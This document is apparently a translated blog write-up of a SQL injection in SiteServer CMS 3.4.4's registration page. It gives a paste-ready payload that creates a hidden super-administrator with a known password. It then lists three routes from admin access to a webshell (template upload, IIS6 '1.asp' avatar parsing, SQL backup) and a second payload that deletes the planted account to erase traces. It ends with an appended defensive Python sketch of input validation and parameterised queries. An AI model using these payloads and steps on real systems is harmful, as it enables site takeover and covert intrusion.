Recently, while looking at a site, I came across this CMS. Some vulnerabilities for it have been published online, with no specific version given,
but when I actually tested them on 3.4.4 they turned out not to work, so I went to the official website to get a copy of the latest edition.
I looked through it and found some rather interesting problems.
About SiteServer: the version tested here is:
SiteServer series products, latest version: 3.4.4 full version (released 18 July 2011)
Download: http://www.siteserver.cn/download
Customer cases: http://www.siteserver.cn/customer
I also did a quick Baidu search to gauge the number of customers.
Vulnerability description: the problem is in the Register class in UserCenter.Pages.dll. The logic of the registration process is flawed,
as follows. First, the program puts the user name into a database query; if the user name is not a duplicate, it moves on to the second step.
Second, it checks whether the user name contains illegal characters; if not, the process proceeds to the third step.
Third, the new user is inserted into the database. Because the first step puts the user name into the
database query without any processing, it is open to SQL injection.
At http://127.0.0.1/UserCenter/register.aspx, fill in the user name field with the following statement, and fill in the other fields normally.
1 2 3');insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
After the registration is submitted, a super user is inserted into the database with user name: blue, password: lanhai.
Default back-end address: http://127.0.0.1/siteserver
From the back end to a webshell (get a webshell, or escalate privileges directly):
opinions differ and everyone has their own way of doing it. I took a rough look, and there are 3 methods.
First, Site Management -> Display Functions -> Template Management -> Add Single Page Template -> generate an aspx file directly.
Second, Member Permissions -> Add User -> user name: 1.asp
Log in at http://127.0.0.1/usercenter/ with the 1.asp user just added, then upload a personal avatar
and use the IIS6 parsing vulnerability to get a webshell. PS: adding a user in the back end does not verify whether the name contains illegal characters.
Third, System Tools -> Utilities -> View Machine Parameters shows the database type, database name and web path. System Tools ->
Database Tools -> SQL Statement Query: this function is well made, it is effectively a Query Analyzer, with results echoed back.
You can get a webshell through a backup, or go in directly through an improperly configured SQL Server.
When finished, remember to go to http://127.0.0.1/UserCenter/register.aspx
and register with 1 2 3');delete bairong_Administrator where UserName='blue';– as the user name,
to clean up. Finally, I hope SiteServer fixes this promptly after seeing it. This article is for technical study only; do not use it for illegal purposes.
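The fix for the registration flaw described above, as an added example that is not SiteServer's code: validate the user name first, and use bound parameters for both the duplicate check and the insert. Python with an in-memory SQLite table stands in for the ASP.NET/SQL Server stack; the table schema, the allowlist pattern and all function names are assumptions. The same allowlist also rejects the `1.asp` user name from the second method.

```python
import re
import sqlite3

# Assumed policy for this sketch: 3-20 letters, digits or underscore.
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{3,20}")

def open_db():
    """In-memory stand-in for the CMS user table (constructed schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT)")
    return db

def username_exists(db, username):
    # Bound parameter: the value travels as data, never as SQL text.
    sql = "SELECT 1 FROM users WHERE username = ?"
    return db.execute(sql, (username,)).fetchone() is not None

def register(db, username, pw_hash):
    """Return 'ok', 'invalid' or 'taken'."""
    # Step 1: validate before any query sees the value.
    if not USERNAME_RE.fullmatch(username):
        return "invalid"
    # Step 2: duplicate check with a bound parameter.
    if username_exists(db, username):
        return "taken"
    # Step 3: insert with bound parameters, committed as one transaction.
    with db:
        db.execute("INSERT INTO users (username, pw_hash) VALUES (?, ?)",
                   (username, pw_hash))
    return "ok"

def demo():
    db = open_db()
    quoted = "123');--"  # constructed input with SQL metacharacters
    results = [
        register(db, "alice", "hash-placeholder"),   # ok
        register(db, "alice", "hash-placeholder"),   # taken
        register(db, quoted, "hash-placeholder"),    # invalid
        register(db, "1.asp", "hash-placeholder"),   # invalid
        # Defence in depth: without step 1 the bound value is still inert.
        username_exists(db, quoted),
    ]
    rows = db.execute("SELECT COUNT(*) FROM users").fetchone()[0]
    return results, rows

if __name__ == "__main__":
    print(demo())
```

Either control alone would have stopped the injection; applying both means a mistake in the allowlist does not reopen it.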